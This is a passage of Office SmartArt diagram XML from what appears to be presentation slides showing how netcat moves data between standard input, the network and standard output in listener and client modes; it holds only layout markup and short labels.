    <dgm:cxn modelId="{C922FB42-297B-A649-9488-6F99795E4F96}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{A37399DC-1B66-E241-AA91-521795EF125F}" srcOrd="2" destOrd="0" parTransId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" sibTransId="{60F005BB-4952-1243-89BB-71159DDC310C}"/>
    <dgm:cxn modelId="{7BC6A92C-C2BE-0A42-8EFB-C4FFDBA9DA64}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{52A68F08-D51E-DA4A-B2FC-D8B8371D6174}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{6ACAEF23-AF4D-9B40-A073-4F38E47A7F35}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{572E09E2-B853-884C-BF11-3E715667A76B}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{0EF557C1-012F-624A-9220-DC83204851A1}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{3E3F99CF-961A-3A4A-A6E4-8D32602AE8F2}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{85D071C6-0976-1943-9E50-95B94EF1200C}" type="presParOf" srcId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2582C6B6-EFE9-924B-B3B5-B44BE5BF7A08}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{F5F440B1-0FEA-8D4F-858D-69007CAE6139}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{46189233-14A5-1C4F-81F0-83268CA51592}" type="presParOf" srcId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{263AB53E-B1F8-2048-8AC6-A8153265D7ED}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/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415DA5-B641-AE47-B152-0640D50A7719}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process2" loCatId="" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            <a:t>The Network</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA574525-CEAC-764C-8294-27D07CC525CA}" type="parTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" type="sibTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" type="pres">
      <dgm:prSet presAssocID="{75415DA5-B641-AE47-B152-0640D50A7719}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" type="pres">
      <dgm:prSet presAssocID="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="1" custScaleX="258070" custScaleY="233333" custLinFactNeighborX="1716">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{41023F7F-8BB2-324B-973D-23F17E058F55}" type="presOf" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" srcOrd="0" destOrd="0" parTransId="{CA574525-CEAC-764C-8294-27D07CC525CA}" sibTransId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}"/>
    <dgm:cxn modelId="{9797D958-6445-C54E-8B64-D61B6A58D7F3}" type="presOf" srcId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{23B0E446-AA8A-C845-BD9D-2340ECEE9FAE}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/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415DA5-B641-AE47-B152-0640D50A7719}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process2" loCatId="" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{993A5793-FE76-3249-8156-E78426EB7FB3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" type="parTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" type="sibTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
            <a:t>Netcat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
            <a:t>Listener </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            <a:t>Mode</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            <a:t>(Waits for Connection)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA574525-CEAC-764C-8294-27D07CC525CA}" type="parTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" type="sibTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A37399DC-1B66-E241-AA91-521795EF125F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" type="parTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60F005BB-4952-1243-89BB-71159DDC310C}" type="sibTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" type="pres">
      <dgm:prSet presAssocID="{75415DA5-B641-AE47-B152-0640D50A7719}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" type="pres">
      <dgm:prSet presAssocID="{993A5793-FE76-3249-8156-E78426EB7FB3}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" type="pres">
      <dgm:prSet presAssocID="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="258070" custScaleY="233333" custLinFactNeighborX="1716">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87617A52-A78B-1D42-A58C-2105C55BC513}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" type="pres">
      <dgm:prSet presAssocID="{A37399DC-1B66-E241-AA91-521795EF125F}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{850DED45-2743-2C44-BCC7-7AC47626166E}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{D66E4555-CFBC-7C45-A216-7DEF3063E540}" type="presOf" srcId="{993A5793-FE76-3249-8156-E78426EB7FB3}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{5B2571B2-E4A8-6E45-841A-4C136905075A}" type="presOf" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" srcOrd="1" destOrd="0" parTransId="{CA574525-CEAC-764C-8294-27D07CC525CA}" sibTransId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}"/>
    <dgm:cxn modelId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{993A5793-FE76-3249-8156-E78426EB7FB3}" srcOrd="0" destOrd="0" parTransId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" sibTransId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}"/>
    <dgm:cxn modelId="{C922FB42-297B-A649-9488-6F99795E4F96}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{A37399DC-1B66-E241-AA91-521795EF125F}" srcOrd="2" destOrd="0" parTransId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" sibTransId="{60F005BB-4952-1243-89BB-71159DDC310C}"/>
    <dgm:cxn modelId="{A76847EC-1EB3-D54D-A918-270EA8B441B5}" type="presOf" srcId="{A37399DC-1B66-E241-AA91-521795EF125F}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{0AAA7691-8145-AF4E-BFCB-9C9647007CC1}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{649C3512-2DAF-3F48-8975-E6701391527A}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{035EA088-A733-964A-B77F-BC5D6DF658DD}" type="presOf" srcId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{0204261D-B665-6840-81C0-10CC369026FE}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{5EE571C0-B3A0-964A-B76C-B189AE9F1932}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{80A80E58-1AEC-9F4B-A1DF-7950BAA1D7FF}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{66D5F904-559E-1144-B4CB-2F8F2C0E8F36}" type="presParOf" srcId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{0786D7BC-0A75-6548-8492-02C6251335F2}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2463124A-6242-0A41-9576-FFF5DC1F6A75}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{8EC51D7B-6CE3-E84A-9BF4-2AA42C021DBB}" type="presParOf" srcId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{0E50E8E3-260C-4E4D-9EB9-F97CBF54281B}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}"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415DA5-B641-AE47-B152-0640D50A7719}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process2" loCatId="" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            <a:t>The Network</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA574525-CEAC-764C-8294-27D07CC525CA}" type="parTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" type="sibTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" type="pres">
      <dgm:prSet presAssocID="{75415DA5-B641-AE47-B152-0640D50A7719}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" type="pres">
      <dgm:prSet presAssocID="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="1" custScaleX="258070" custScaleY="233333" custLinFactNeighborX="1716">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{3EDC0629-37FA-424E-9C4E-BF476D5031C9}" type="presOf" srcId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" srcOrd="0" destOrd="0" parTransId="{CA574525-CEAC-764C-8294-27D07CC525CA}" sibTransId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}"/>
    <dgm:cxn modelId="{3A1C0658-0899-2948-8CD1-35D903694676}" type="presOf" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{54F116DE-0A59-1A4B-8F63-172B779A3D2F}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/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415DA5-B641-AE47-B152-0640D50A7719}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process2" loCatId="" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{993A5793-FE76-3249-8156-E78426EB7FB3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" type="parTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" type="sibTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t>Client Mode</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t/>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
